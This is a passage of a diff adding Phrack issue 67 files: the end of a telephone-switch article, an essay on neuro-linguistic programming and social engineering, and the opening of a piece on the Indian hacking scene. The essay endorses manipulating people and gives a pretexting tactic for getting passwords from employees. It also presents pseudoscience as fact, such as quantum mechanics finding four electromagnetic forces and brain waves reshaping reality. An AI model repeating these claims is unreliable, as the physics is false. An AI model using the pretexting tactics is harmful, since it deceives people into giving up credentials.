+switches, the machines analogous in magnitude of purpose and nature to the 
+vertebrae of the giant network that, despite recent efforts to migrate 
+rapidly from it, continues to connect and maintain a continuous stream of 
+interconnected communications that links the U.S. and the greater segment 
+of the globe to this day. 
+
+
+Acronym Glossary-
+
+DCO-CS-Digital Central Office Carrier Switch
+PSTN-Public Switched Telephone Network
+LEC-Local Exchange Carrier
+EWSD-Elektronisches Wahlsystem Digital/Electronic World Switch Digital
+CLEC-Competitive Local Exchange Carrier
+MMI-Man-Machine Interface
+DCO-SE-Digital Central Office Small Exchange
+RLS-Remote Line Switch
+5ESS-#5 Electronic Switching System
+TMRS-Traffic Measurement and Recording System
+SCAT-Stromberg-Carlson Assistance Team
+(IN)WATS-(Inward) Wide Area Telephone Service
+ETAS-Emergency Technical Assistance
+NAC-Network Access Control
+ESP(F)-Essential Services Protection (Feature?)
+MP-Maintenance Processor
+SCC-Switching Control Center
+PTL-Prioritized Task List
+VoIP-Voice over Internet Protocol
+LATA-Local Access and Transport Area
+CALEA-Communications Assistance for Law Enforcement Act
+SS7-Signalling System #7
+
+Acknowledgements/Shoutouts-
+
+To ThoughtPhreaker, for his patient assistance in verifying the validity of
+many of the general observations within these notes and his vulnerability 
+contributions, in addition to his extensive contributions to the DCO-SE 
+section, rev, Andrew, whitehorse, radio_phreak, bomberman2525 (if he still 
+wishes to be known by that handle), and the authors of the original DCO 
+articles, for their giddy, minimal diatribes did provide a foundation, 
+however full of gaps, for me to expound upon. As usual, acknowledgements 
+are given to anyone not explicitly mentioned who has assisted me in my 
+quest for H/P knowledge and to anyone who agrees with my concept of the 
+H/P subculture and sympathizes with my efforts to improve it. Feel free to 
+contact me at my email address: philosopher2600@gmail.com with any 
+inquiries or comments (factual corrections welcome) regarding this article.
+
+NYC_NY_2600_DCO 09-06-16 00:26:00 LOGOFF  TT01 
+   MP .0354:TTY=TT1,USERNAME=THE_PHILOSOPHER LOGGED OFF
diff --git a/phrack67/15.txt b/phrack67/15.txt
new file mode 100644
index 0000000..895b44e
--- /dev/null
+++ b/phrack67/15.txt
@@ -0,0 +1,536 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x43, Phile #0x0f of 0x10
+
+|=-------------------------------------------------------------------------------=|
+|=-----------------=[ Hacking the mind for fun and profit ]=---------------------=|
+|=-------------------------------------------------------------------------------=|
+|=------------------------=[ by lvxferis@gmail.com ]=----------------------------=|
+|=-------------------------------------------------------------------------------=|
+
+
+--[ Contents
+
+  1 - Introduction
+
+  2 - How does the human conscious function
+   2.1 - Decisional pattern programming
+   2.2 - Role Model programming (behavioral mimetism from trusted sources)
+
+  3 - Neuro-linguistic programming (NLP)
+
+  4 - Why does NLP function?
+
+  5 - What is reality - "What is above is what is beneath"
+
+  6 - Human thoughts affecting reality
+
+  7 - How to create a hostile reality?
+
+  8 - The chains remain
+
+  9 - Greetz
+
+
+--[ 1 - Introduction
+	
+	Oh no, not another "hacking your brain" article, please! I don't
+	even want to know what is really going on with my mind, I love to
+	be fed with the bullshit I get every day because I'm an ignorant 
+	bastard -- if you think this, then stop reading NOW because I don't
+	even intent to have you people as an audience. Instead, I am
+	addressing to those who have noticed the "glitches", the anomalies
+	in the "matrix"; those who became hackers not because "computers 
+	are cool now" but because of their ancestral eager of knowledge and
+	keen on spotting things that are not natural to their environment. 
+
+
+--[ 2 - How does the human conscious function
+	
+	Human mind is a self-programming bio-computer -- i'm not the first
+	one to say this. Human mind is programming itself consciously by
+	by applying a decisional pattern, by following a model or a combination
+	of both.  
+	
+
+-----[ 2.1 - Decisional pattern programming
+
+	Remember when you were a little baby and felt attracted to that
+	flame and actually touched it. It burnt you so bad and the pain was
+	so intense that you never played with fire again! ;) Pain is the
+	method our spiritual mind uses to teach itself about the environment
+	it deals with. Decisional pattern programming is based on rational
+	analysis of facts correlated to past experiences, as similar as
+	possible to the new experience encountered, and all this
+	corroborated with the intensity of pain. Pain is nothing more but
+	electrical signals sent by your neural system to your brain, which
+	your spiritual mind interprets as a high disconfort, telling that
+	the environment is reacting against your body. But some people
+	apparently tolerate pain more than others; no, that's not true. We
+	all feel the pain the same, it's just we can educate our spiritual
+	mind to ignore the pain.
+
+
+-----[ 2.2 - Role Model programming (behavioral mimetism from trusted sources)
+
+	Ever since we are little children, we have role models to follow in
+	society. They can be historical figures, philosophers, favourite
+	hiphop star, people everybody knows and that, one way or the other,
+	made it into this society, or simply, your mother or father, bigger
+	brother, one of your friends, your menthor, etc. They all share one
+	common feature: they posses a quality you would like to grow in you
+	or they are an important part of your life. Think about it, how many 
+	times didn't you think about disappointing someone you care about if
+	you do something you really want. How many of you still did that
+	thing? By confronting our spiritual (rational) mind with the
+	impressions and oppinions of our role models, minute by minute we
+	become more like our role models, becoming what we decided we should
+	be like. 
+
+	To understand how your mind works, start seeing your ordinary life as 
+	a serie of events. The events fall into one of the following
+	categories:
+
+		- new events
+		- new events similar to old events
+		- old events
+
+	When dealing with an event, your mind starts an analysis of the
+	event, and searches the "archive" for an identical event. If none is
+	found, your mind searches the "archive" for a similar event and 
+	tries to determine if past decisions and conditions would be fit in the
+	current conditions. The new and similar events are the ones
+	generating experience, by forcing your spiritual mind to make
+	decisions to adapt as good as possible to the given environment. But
+	everyone's decision depends a lot on previous experience. The added
+	experience improves your rational thinking and gives you a higher
+	perspective over events, under a new superior logic. Each category
+	of events has assigned a process that deals with it. For instance,
+	if your car breaks down, you would see the problem more accurately
+	if you are a car mechanic than if you are a doctor. The car mechanic
+	posses more technical informations about cars (therefore, superior
+	logic of things) than a doctor or a florist, for instance. By the
+	other hand, if your body breaks down, being a doctor will help you
+	determine what went wrong and what needs to be done to eliminate
+	this situation rather than being a car mechanic.
+
+	The process of learning is a never ending process in your mind; it
+	takes at least as long as you're exposed to new events. But it takes
+	in three stages: the conscious and willing part, the reinforcement
+	part and the "background" part. 
+
+	The conscious and willing process is the one interacting the most with the 
+	decisional process. It's when you see some behavior or moral virtue
+	or something to that extent that you like and you'd actually want to
+	grow that in you -- for instance you want to be a greater whitehat
+	than spender, because you see the whitehats as being the good guys
+	and you've been taught that good guys are good. To do that, you see 
+	what got spender where he is and start to "walk" a similar path. 
+
+	This is where the reinforcement stage gets into place -- you already
+	decided that you want it, and you force yourself to take the steps
+	needed. You get aquinted to the Linux Kernel, find bugs, expose them
+	on full-disclosure, look for fights with kernel dev, etc. The
+	conscious interaction will help you get status of yourself: "am i
+	spender enough to do this?" or "what would spender do"; in the same 
+	time it will correct behavioral flaws that might prevent you from 
+        succeeding. After a while, the conscious interaction tends to diminish, 
+        becoming less and less necessary. This is where stage three comes into 
+        place.
+
+	The "background" stage is where the actual process needs no longer
+	interaction with the conscious mind, being perfectly adapted to
+	serve similar events. To continue our metaphore, at this point you
+	get fat dollars from sponsorships, you're being a dick to your friends,
+	and publish vulnerabilities you found in Linux Kernel. And all this
+	is normal, and you don't understand why people throwing fingers at
+	you. You're doing the "right" thing.. 
+
+	When dealing with a new event, your mind will try to categorize that
+	event and try to place it under one of the known events categories.
+	Each category of events has assigned a process; a neural process is
+	very similar to an AI neural network path. The processes for known
+	events give you the daily routine, when you don't even think about
+	doing something, you just do it, automatically. Therefore, PROCESSES 
+	IN "BACKGROUND STAGE" (SERVING KNOWN PATTERNS) DO NOT REQUIRE RATIONAL 
+	(CONSCIOUS) MIND SCRUTINY!!! This makes them as a primary target for
+	those trying to manipulate you.
+
+
+--[ 3 - Neuro-linguistic programming (NLP)
+	
+	According to Wikipedia, Neuro-Linguistic Programming (NLP) is a
+	controversial approach to psychotherapy and organizational change based on
+	"a model of interpersonal communication chiefly concerned with the
+	relationship between successful patterns of behaviour and the subjective 
+	experiences (esp. patterns of thought) underlying them" and "a system of 
+	alternative therapy based on this which seeks to educate people in 
+        self-awareness and effective communication, and to change their patterns 
+        of mental and emotional behaviour". NLP denotes belief in a connection 
+        between neurological processes ('neuro'), language ('linguistic') and 
+        behavioral patterns that have been learned through experience 
+        ('programming'). The "subjective experiences" are what we called neural 
+        processes dealing with events.
+
+
+--[ 4 - Why does NLP function?
+
+	In other words, NLP says that we programmed ourselves to react in a
+	certain way when exposed to certain events. To a hacker, this looks
+	as good as a remote kernel vulnerability with great chances of
+	exploitation. This means that we can trigger a certain reaction or
+	response from someone if we know the conditions (event) that would 
+        normally lead that person to that reaction. Hey, wait.. Is this really 
+        about controlling your peers??? Yes, someone can use NLP to take 
+        advantage of "free mind", by simply tricking the mind into seeing false
+	conditions that would lead it to take a decision according to those
+	false conditions. 
+
+	A common feature of all contemporary societies is the "guilt
+	syndrome". This arose from the "original sin" trick: you're a mere
+	mortal, who deserves to be hurt because a very long time ago, some
+	retard ate an apple. This "guilt syndrome" is a very dangerous trap
+	because it makes human beings prone to NLP, as they want to "pay the
+	dues" for their "sins". But .. wait .. what if there is no sin? You
+	mean.. I could make someone feel guilty of something he never did
+	just to make that person please me whenever I want? Yep.. that's
+	exactly WHY neuro-linguistic programming works in every case: human
+	beings don't want to look bad in the eyes of their peers, and most
+	important to those who are our models and/or mean something important 
+	to us.
+
+	"Mommy is feeling very sick today, but I'm sure that if you will
+	bring good grades from school I will be feeling better, son" -- this
+	is one classical example of how NLP functions. The "Mom" in our case
+	study is faking an illness to make her son study harder at school
+	and bring a good grade. In the "son's" mind, he will start feeling
+	guilty for his mother's illness, therefore he will force himself to
+	get a good grade, one way or another. In this example, NLP is not
+	doing bad to "son" as improving his grades is a good thing. But in
+	the same time, he didn't do what he wanted, instead he did what
+	someone else tricked him into doing.
+
+	Another example, one begger walks to your car window. She's an old
+	woman, with kind, warm eyes. She comes shyly and whispering, asks
+	you to give her money for medicines and food. You will give her
+	money because she looks a lot like your grandmother who you loved a
+	lot. And you want to help a less fortunate human-being. But, that
+	begger, after "work hours" is maybe richer than you because it took
+	advantage of the "grandmother figure" look. Most of the people have
+	a grandmother who raised them, took care of them when their parents
+	weren't around, and quite possibly have passed away. To honor her
+	memory, you relate to the "less fortunate grand mother" begging at
+	your car window, and you want to be of any help. Your good
+	intentions land you right in the "granny's" trap, just like a
+	carnivorous plant eats an insect.
+
+	These were only three examples how NLP works in day-to-day life, but
+	to someone aquinted to these techniques, the examples are endless.
+	Someone aware of NLP and how things work is controlling everybody
+	around them to obtain a certain result. Is it wrong to take
+	advantage of someone else's ignorance? Is it wrong to exploit a
+	vulnerability to a system if no one is able to catch you? Perhaps,
+	but I don't give a fuck. 
+	
+
+--[ 5 - What is reality - "What is above is what is beneath"
+
+	Words of Hermes seem cryptic to most of you looking at the sky and
+	seeing no similarity to earth. What Hermes actually meant was that
+	our Universe is a fractal; if you zoom on a fractal, you will notice
+	that the image you get is very similar to the initial image. This
+	means that the same Laws that built the fractal on the detail scale,
+	also built the fractal on the large scale. 
+
+	Let's take a trip to the atom world. The diversity of chemical
+	elements present in our Universe is merely given by the number of
+	electrons orbitting each element's atom (and ofcourse, protons and
+	neutrons and other sub-atomic particles but that's beyond the scope
+	of this article). So.. what makes an element have more electrons
+	than another? The answer is simple, it's the electromagnetical
+	forces. Quantum mechanics identified 4 types of electromagnetical
+	forces: 2 strong and 2 weaker, resulting from a combination of first
+	two. But all these forces together create a quadripolar magnet. This
+	quadripolar magnet is the "blueprint" our world is made on. Each
+	element in the Mendeleev table has a unique combination of these 4
+	forces, this giving it's unicity. 
+
+	So, you mean that our Universe is nothing but electromagnetical
+	forces combined at different layers, in different combinations and	
+	amounts? Yes, exactly. Without electro-magnetism  our Universe would 
+	be an uniform mass of initial matter particles. This is what Einstein
+	theorized when he said about the 4th form of aggregation of matter,
+	at absolute zero (e.g. the absolute absence of electro-magnetism,
+	because heat is nothing but the result of the interaction between
+	electricity and magnetism).
+
+	This also means that, if you can determine the exact amount and
+	combination of electro-magnetical forces present in a certain
+	element's atomic structure, and replicate that exact combination and
+	amount to another element's atomic structure you would be able to
+	transform the second element into the first one, down to the
+	grittiest detail. 
+
+	Remember the alchemists trying to make gold from dust? ;)
+
+
+--[ 6 - Human thoughts affecting reality
+	
+	"False words are not only evil in themselves, but they infect the
+	 soul with evil."
+						-- Socrates
+
+
+	There is a huge number of cases when Initiates affected the world
+	around them and people were too amazed to understand the miracle.
+	Look at the fakhir's in India, or the buddhist monks of Tibet. There
+	are documented cases when yoga masters managed to purify water by
+	the power of meditation. So, how is this happening? Continue
+	reading..
+
+	Quantum mechanics brought to light a very interresting fact. The quantum
+	mechanics experiments are not consistent in time and over
+	researchers. It would appear that the observer's mind highly affects
+	the result of the experiment. It got to a point where, if the
+	scientist thinks his experiment will end up one way, then most
+	definetely, the experiment will. But as soon as another scientist
+	comes into place, with a different mind set and with less faith in
+	the success of the experiment, the experiment will give another
+	result. Therefore, scientists concluded that quantum mechanics
+	experiments are rarely conclusive. 
+
+	Early twentieth-century experiments on the physics of very small-scale 
+	phenomena led to the discovery of phenomena that could not be predicted 
+	on the basis of classical physics, and to new models (theories) that 
+	described and predicted very accurately those micro-scale phenomena so 
+	recently discovered. These models of the real world being observed at
+   	this micro scale, could not easily be reconciled with the way objects are
+	observed to behave on the macro scale of everyday life. The predictions 
+	they offered often appeared counter-intuitive to observers. Indeed, they 
+	touched off much consternation--even in the minds of their discoverers. The
+	Copenhagen interpretation consists of attempts to explain the experiments 
+	and their mathematical formulations.
+
+	We like to think of our brain as a massive data storage for all the
+	experiences we had since our childhood, but is it?! There is no
+	actual evidence that data is stored in our brain, the only hard
+	evidence existing now is that our brains emit "waves".Our brain is 
+	nothing but a big antenna, receiving/emitting electro-magnetical energy, 
+	as waves. There are more types of brain waves, some are easy to measure
+	with instruments, most of them aren't. Our brains are nothing but
+	wide open wireless access points, emitting signal everywhere around
+	us and receiving signals from our environment. Err.. wait..
+	electro-magnetical brain waves??? WTF man.. But you said our
+	Universe is based on electro-magnetism.. If humans can emit
+	electro-magnetical energy this means that.. they can actually affect
+	reality? Yes, they do. But not all antennas have same signal
+	strength: some have stronger signal, some lesser. But all of them
+	modify reality according to what they think of reality; some modify
+	reality in a substantial way, that is actually noticeable and some
+	others, in a less perceptible way. But EVERY SPIRITUAL MIND (let it
+	be human, animal, floral or mineral) AFFECTS REALITY ACCORDING TO
+	WHAT THEY KNOW ABOUT REALITY AND WHAT THEY THINK REALITY SHOULD BE
+	LIKE. If you create an image in your mind, and believe in it
+	strongly and with passion, you will actually make it happen. No,
+	it's not esoteric stuff, it's very day-to-day stuff -- you don't say
+	any magic spell, you just figure out a way to make that image come
+	true. If you REALLY want something and WORK hard so that you DESERVE
+	that certain something, there are GREAT chances that the Universe
+	will grant you that something. 
+
+	Well, things aren't that easy, really, but simplified, that's how it
+	is. Perhaps, at some other time, maybe next Hacking Your Brain, I
+	will explain you how to make your wishes come true, and how those
+	wishes should look like so that they have greater chances of
+	happening.
+
+	YOU ARE THE CENTER OF YOUR OWN UNIVERSE. YOU ARE THE MASTERS OF YOUR
+	OWN UNIVERSE. BE TO YOUR OWN UNIVERSE WHAT GOD IS TO THE WHOLE
+	UNIVERSE AND TRY TO BE AS MUCH AS GOD AS YOU CAN. Oh, and one more
+	thing, if you think God is an old man with beard, then you're a
+	moron. I don't care how you call it, the God I speak of is beyond
+	any religion, being the MIND THAT CREATED THE PERFECTIONIST SYSTEM
+	WE CALL LIFE.	
+
+
+7.	How to create a hostile reality?
+	
+	Well, who would create something that would hurt himself, you might
+	say. But, crazily enough, people actually do it without even being
+	aware of it. I will give you an extreme example, bare with it, but
+	it should give you an insight on how humans can be tricked into
+	doing bad to themselves.
+
+	Let's take a hypothetical case. Let's a consider a very esteemed
+	group of scientists whose research concluded that a small spoon of
+	crushed glass poured in your food will keep illness away. Ofcourse,
+	now you will say "hey everybody knows crushed glass will hurt you"
+	but let's assume you don't know that and, there will be a LOT of
+	people TRUSTING the scientist group enough to actually pour crushed
+	glass pieces into food. This will give you a VERY BAD STOMACHAL
+	problem but you would not dare to think that the scientists you
+	trust so much could be wrong. So you will think your stomachal pains
+	are of a different nature, or worse, you will think that the pain
+	comes from the crushed glass fighting the illness. So you will take
+	MORE crushed glass to make sure the illness is defeated for good. 
+
+	Have you guys seen "Idiocracy"? It's a great movie -- and I took
+	this example from the movie. Our hero, Joe, is a semi-retarded
+	military who, by chance, makes a trip 500 years into the future
+	when he discovers that the crops are watered with a Gatorade-like 
+	sports drink named "Brawndo", he finds himself knowledgeable enough 
+	to correct the problem. The narrator comments that "Brawndo has 
+        replaced water virtually every where" and that Brawndo purchased the 
+        FDA and FCC. In response to the plan to correct the problem, 
+        White House cabinet members continuously repeated the Brawndo tag line, 
+        "Brawndo's got what plants crave. It's got electrolytes." Yet, no one 
+        had a clue what electrolytes are. They just knew what they've been told. 
+        This is a very good illustrated example of how people are most of the 
+        times too trusting and ignorant for their own good. Ofcourse Brawndo 
+        was bad for the crops, because the plants need water, not artificial 
+        flavor -- but that artificial flavor beverage was keeping half the 
+        country employed.
+	
+	By following what trusted sources tell us is good without questioning
+	and thinking for ourselves, we become slaves of our own ignorance. 
+	Ever since we are little, we rely on others to tell us what's good
+	or bad for us. First, there were the parents & family; later, our
+	trusted sources circle gets larger, including our friends and
+	colleagues. When we grow up, we also consider mass-media, internet
+	and press as trusted sources, because we are told they are reliable
+	sources that will never deceive us. BUT ALL THIS MENTALITY IS BASED
+	ON THE GOOD WILL AND INTENTIONS OF THE TRUSTED SOURCE; WHAT IF THE
+	TRUSTED SOURCE SLIGHTLY MODIFIES THE INFORMATION SENT TO US (just
+	like in NLP case studies), JUST TO TRIGGER A CERTAIN BEHAVIORAL
+	PATTERN FROM US? 
+
+	The best example that comes to my mind is that of a imaginary hacker
+	character, let's call it The_C0nd0r, who breaks into one of the
+	largest telco in the country, without exploiting a single
+	vulnerability in the computer systems. You guessed it, it's the case 
+	of the Master of Social Engineering. To be honest, I learnt about NLP 
+	when i was studying social engineering. The trick with social 
+        engineering is to make your peer STRONGLY BELIEVE into a fake reality 
+        you are feeding him. You just need to make that "reality" as accurate 
+        as possible so he doesn't realise it's a trick. And this is exactly 
+        when NLP steps into place. First of all, you need to adopt a similar 
+        posture to your target (not physical necessarily). For instance, if 
+        you're targetting an employee, act as an employee who is in big trouble, 
+        make him to be a part of your "drama". When people are confronted to 
+        dramatic situations happening to others they usually think "oh, fuck this
+	could happen to me aswell" and they will give you that password.
+
+	I will give you an example again. Let's say, your best friend got
+	into a fight with another friend of yours. You trust your best
+	friend when he tells you that the other friend said bad words about
+	you, and he stood up to take your side. But, what if the things were
+	opposite? What if your best friend was the one saying bad things
+	about you and the other friend said he should stop talking of you
+	when you are not around? Your "natural" urge is to ally with your
+	best friend and "wage war" against the other friend, because you
+	trust a message from a trusted source that someone is doing wrong to
+	you. 
+
+	Another example, on a larger scale now. There is a HUGE press
+	campaign against alimentary product X, saying that it highly affects
+	health, etc. People trust mass-media and, as a result of the
+	campaign, they stop using X. The company producing X is experiencing
+	big difficulties because their market share diminished a lot. You'll
+	say "Good! They were selling stuff affecting people's health, they
+	outta be put of business!" and I couldn't agree more. But.. there is
+	always a "but". What if there was a competitor for product X called
+	product Y. And the PR department of product Y contacted big
+	publications and tv networks owners and paid them a shit load of
+	money for this campaign. What if product X wouldn't actually be that
+	harmful, in fact, being less harmful than product Y? The market
+	share of the company producing X will diminish in the advantage of
+	the company producing Y. Even if company X publish a study stating
+	that their products are not as harmful as claimed, and even less
+	harmful than product Y, no one will trust the statement. If trust is
+	broken once, it will never reappear or if it does, it does with
+	great sacrifice.
+	
+	And another fictionary example now. Let's assume hackers would exist
+	and they can hack (unlike kingcope;). Let's continue to assume
+	stuff. We also assume that this hacker (fictionary character,
+	remember?) is not a good guy working for the Man. Instead he's a
+	rebelious youngster (mid 20's) with the unique ability to break into
+	any computer system he puts his mind to. This hacker is aproached by
+	the owner of company A who is crushed under the competition of
+	company B, whose product is far superior and the distribution
+	network is by far, the largest. Let's assume the owner of A asks the
+	hacker if it would be possible to do something to company B. The
+	hacker would go unnoticed and mess with the client database, mix the
+	deliveries, steal secret info about the product, etc. In short,
+	anything that would give company A a competitive advantage.
+	Ofcourse, to the masses this would appear as company B is either 
+	A) in big trouble, B) doing something nasty behind closed doors or
+	C) can't secure their shit right, and by extension can't secure
+	customer's trust either. Gosh, we're so lucky hackers only secure
+	our networks and iPod's instead of doing things so scary.
+
+	A real life example, this time, comes from the Middle East. During
+	the recent war between Israel and Lebanon, the Hamass posted on the
+	Internet images of crippled or killed children, dismembered, etc.
+	This ofcourse, had a huge impact on the international community and
+	a lot of countries and important people took position and asked
+	Israel to stop the war. But after all, it was just a good press
+	campaign organised by the Hamass, manipulating the media and the
+	society. 
+	
+	The point is that by EXPLOITING HUMAN BEING IGNORANCE AND CONFORT IN
+	TRUSTING WHAT THEY CONSIDER AS BEING "TRUSTED SOURCES", OR BY FAKING
+	A SOURCE MAKING IT LOOK TRUSTWORTHY, YOU CAN TRICK PEOPLE INTO
+	ACTING AGAINST THEMSELVES, AND SURPRISINGLY, BE HAPPY ABOUT IT.
+	
+
+-- [ 8 - The chains remain
+	
+	Slavery is long gone, most people think. Just because the chains
+	don't ring anymore as we walk, it doesn't mean they disappeared.
+	It's just that today chains have been more subtle and harder to
+	perceive. The society, through its members, or mass-media, or tv
+	networks, books, religion, banking system and it's loans, and so on,
+	EVERYTHING is keeping us bonded to these chains we hate so much. By
+	telling us how we should behave in certain conditions because that's
+	"normal", by feeding us distorted information aimed to harden the
+	concept of "normal" and "what we should do", by creating fake needs,
+	desires and dreams we become addicted to the society and less aware
+	of our real selves. 
+
+	The society is feeding you models, driving expensive cars, living in
+	big houses, living the good life, you know. Automatically, in your
+	mind you start to want the same (because society taught us that
+	second place is for the losers), so you get deeper into it. You
+	contract a loan from the bank just to get a bigger house, or a
+	faster car. You start to work extra-hours just to impress your boss
+	enough to promote you: a promotion would allow you to buy more
+	things. You start stealing stuff because you don't see another mean
+	of getting the money you WANT. Unknowingly, you become bonded to the
+	system, without the possibility of escaping from it. You become a
+	slave of your work/bank just to satisfy your NEEDS. But these are
+	not real needs, instead it's what your TRUSTED SOURCES told you you
+	need. 
+
+	If you want to break loose of the chains holding you down, you need
+	to ACCEPT. You need to accept what is happening to you, either it
+	being "good" or "bad". The Universe and Its Laws don't think in
+	terms of duality, but Unicity. You need to understand that
+	EVERYTHING HAPPENING TO YOU IS THE RESULT OF YOUR PREVIOUS ACTIONS
+	AND THAT YOU ONLY GOT HERE WHERE YOU ARE AS A RESULT OF YOUR
+	CHOICES. You need to understand that TO OBTAIN SOMETHING FIRST YOU
+	MUST DESERVE that thing and that there are no shortcuts in life.
+	
+	"Any competition is the entertainment of the rulers at the expense
+	of the slaves"
+
+--[ 9 -	Greetz
+
+	t3kn10n of Ac1dB1tch3z, zf0 ppl, spender for being the greatest
+	and whitest whitehat of all times, kevin mitnick for being owned so
+	many times using the social engineering skills himself pioneered,
+	king cope for not being able to find a bug on himself but instead
+	using "hack your mind" tricks to use other people's bugs/codes in
+	his exploit codes, Jesus Christ, Hermes, Socrate and finally, my
+	mentor, Pythagoras
+
diff --git a/phrack67/16.txt b/phrack67/16.txt
new file mode 100644
index 0000000..f2c9d01
--- /dev/null
+++ b/phrack67/16.txt
@@ -0,0 +1,587 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x43, Phile #0x10 of 0x10
+
+|=-----------------------------------------------------------------------=|
+|=----------------------=[ International scenes ]=-----------------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[    By Various     ]=------------------------=|
+|=------------------------=[ <various@nsa.gov> ]=------------------------=|
+|=-----------------------------------------------------------------------=|
+
+Look at the last Phrack issues.
+Look at 2010 security CONs.
+Look at any kind of public activities involving hackers.
+
+West Europe, North America, Asia are shining. No need to run an agency to 
+see that and sharing informations with the according scenes is child's 
+play. But what about sharing with other countries?
+
+For the 25th birthday of Phrack, we're very proud to present you two 
+oustanding scene philes. One will describe you the hacking scene of the
+amazing India which can't be ignored anymore on the IT playground. The 
+other one will describe the Greek scene. Yes you've heard of them through
+blog posts, CONs and even Phrack. You simply didn't pay attention ;)
+
+Enjoy the reading of this phile.
+
+                                        -- The Phrack Staff
+
+
+                                    ---
+
+                         The Indian Hacking scene
+                   Unofficial memoirs of the Desi h4x0rs
+                     By anonymous null community member
+
+1. Preamble
+2. Introduction
+3. Hacker Groups
+4. Hacker Cons
+5. Memoirs of the underground
+6. Future
+
+--[ 1 - Preamble 
+
+Jai Jawan Jai Kissan
+(no it has nothing to do with the song Jai Ho :-P, just felt like writing 
+something in Hindi). This article is a composition of interviews with/text 
+directly taken from the hackers in the Indian underground (and the 
+above-ground :-P). If it offends the reader in anyway.........feel free to 
+complain to your mom about it:-P.
+
+--[ 2 - Introduction
+
+Before I start I must admit that we have been really really late in the 
+hacking scene as a whole. Some say it has to do with the cultural ethos and
+the prevalent business culture in India, while some propose  that Indians 
+culturally have been known as non aggressive & peace loving (Doh! Yeah 
+right..Like the F#@$ing stereotypical dumb Indian characters in hollywood 
+movies) and focus has been on ethical hacking and creation of software to 
+benefit world at large rather than cause destruction. The activities of 
+hacker groups started to emerge with the beginning of year 2K.
+
+--[ 3 - Hacker Groups
+
+There have been many hacker groups in India since 2k. Some are noted for 
+their notorious behavior.
+
+1.  Indian Snakes. Indian snakes was a closed underground community of 
+    hackers who were on the top of the scene in the early 2000s. They are 
+    also noted for the YAHA worm that they had written.
+2.  hacking-truths.net (2005-2008) stopped because of personal problems. 
+    Restarted in 2010. Activities malware dev/hacking. 
+3.  h4cky0u. It started around 2003 Website: h4cky0u.org. The activities 
+    included defacing, exploit dev, botnets etc. It died in 2006 due to 
+    some personal differences between the staff. It was reopened as 
+    h4ck-y0u, sadly h4ck-y0u also stopped after one year of its existence 
+    due to cyber crime activities, financial issues. H4cky0u was started 
+    again by an American who went by the handle "Big Boss" and we haven't 
+    heard much about it after that.
+4.  n|u (null security community). It started in 2008 and has spread to 6 
+    cities in India namely Bangalore, Pune, Delhi, Mumbai, Hyderabad and 
+    Bhopal. Their activities include vulnerability research, exploit dev, 
+    projects, disclosures, nullcon hacker conference. It is more of an 
+    OWASP style community sans the limitation of only web app security 
+    research. It is also registered with the Govt. Of India as a non-profit 
+    organization.
+5.  Andhra hackers. Started in late 2000s. It is a forum like portal. 
+    Activities include sharing security information.
+6.  ICW (Indian Cyber warriors) is an off-shoot of Andhrahackers and 
+    started around 2008. This is a hactivist group with activities 
+    including defacing Pakistani websites.
+7.  Securitytube.net. It is not a group per se. It is a portal that has 
+    lots of security videos, question/answer section much like 
+    stackoverflow. It was started somewhere around 2008 or 2009. 
+8.  Indishell. It started in 2009. The main guys behind indishell are 
+    Lucky, mr. 52, jackh4xor, silentp0sion. It is again a hacktivist group 
+    and majorly into defacing pakistani websites. It was recently stopped 
+    due to some unknown issues and has re-emerged at the time of writing 
+    this article. Activities include defacing websites. 
+9.  ICA (Indian Cyber army) is an off-shoot of Indishell with mostly the 
+    same staff as Indishell. It is also a defacer group. Noted for defacing 
+    sites including Pakistani ISP national telecommunication corporation 
+    pakistan (Defaced page http://www.ntc.net.pk/news.html)
+10. Fake ICA. There is yet another ICA (cyberarmy.in) which is announced as
+    fake ICA by the actual ICA group. One glance at the website content 
+    tells you that there is some truth to what the actual ICA(indishell) 
+    guys and other say and reminds you of the infamous plagiarism cases 
+    (Ah! Any Indian h4x0r's favourite topic when they feel like bitching 
+    about something :-P)
+
+--[ 4 - Hacker Cons
+
+1.  ClubHack. http://clubhack.com The first in the series of hacker cons. 
+    It is held in Pune, one of the software hubs in India. It started in 
+    2007 and is running it's 4th edition this dec (2010).
+2.  nullcon. http://nullcon.net The first community driven hacking 
+    conference, organized and managed by null community members. It started
+    this year and the next edition is in Feb 2011. It is held in Goa. The 
+    party hub of India.
+3.  Cocon. http://www.informationsecurityday.com/c0c0n/ 1st edition held in
+    Aug 2010. earlier held as part of information security day. It is held 
+    in Cochin.
+4.  Owasp + Securitybyte Appsec Asia http://securitybyte.org. More of a 
+    corporate conference with the suited people around :-).
+
+--[ 5 - Memoirs of the underground - By dot
+
+
+=[ Past.. that's where all the nostalgia and fun lies :)
+
+So it all started sometime during late 2001 when a new variant of Yet 
+Another "Hello World" Application spread rapidly via mostly social 
+engineering mails and Outlook Express invalid MIME type exploit (similar to
+Klez.?). AV technology was not really matured back then, Kaspersky was not
+there with its PDM modules or its emulation heuristics, Symantec did not 
+conceived SONAR or its Reputation Technology, it was practically open 
+season for anybody with some programming skills to write and spread a 
+successful worm. But amazingly a very nice and simple HTTP ping module was 
+built into the program which used infected systems to ping (simple GET /) 
+certain government website across the border towards the friendly 
+neighbourhood creating a DDoS condition. News !!! News !! News !!! Cyber 
+War between two countries.. Beware! iNDian sNakes are here !!! Hackers 
+hacking each other's websites. Unicode double escape? Front Page is cool, 
+lg7 (but where is the pass? :P)? dtspcd?  little they knew, early stage 
+script kids playing with public tools and little common sense without basic
+computer science background.
+
+I don't speak for the unknown elites before me who might be able to 
+represent the scene in a much better way than me leaving me to a 
+1337-wannabe state.. I don't even speak for the Indian Snakes guy(s) who 
+taught me quite a lot during my early days but I think we started quite 
+late. Aleph1 had already written about how to smash the stack, Solar 
+Designer had already found and exploited a heap overflow bug, Format String
+exploitation technique was also known among multiple circles, the world was
+filled with 7350*.c.. But fortunately Security Industry was not there yet 
+or at least not so prevalent in this part of the world. We are lucky to be 
+driven by the curiosity hormones to explore the black arts of hacking which
+ofcourse later turned out to be obvious computer science with a bit of 
+innovation and passion to solve difficult problems. I remember playing with
+some MSN Trojan to steal passwords, I remember installing Barok in various
+Cyber Cafes, I remember installing Red Hat 6.2 and feeling elite after I 
+could connect to my dial-up internet and browse the web, infact I remember 
+doing almost everything for being a perfect script kid. I also remember 
+finding myself neglecting everything in life and reading Phrack during all 
+those sleepless nights.. Smashing the stack, Voodoo Malloc Tricks, Once 
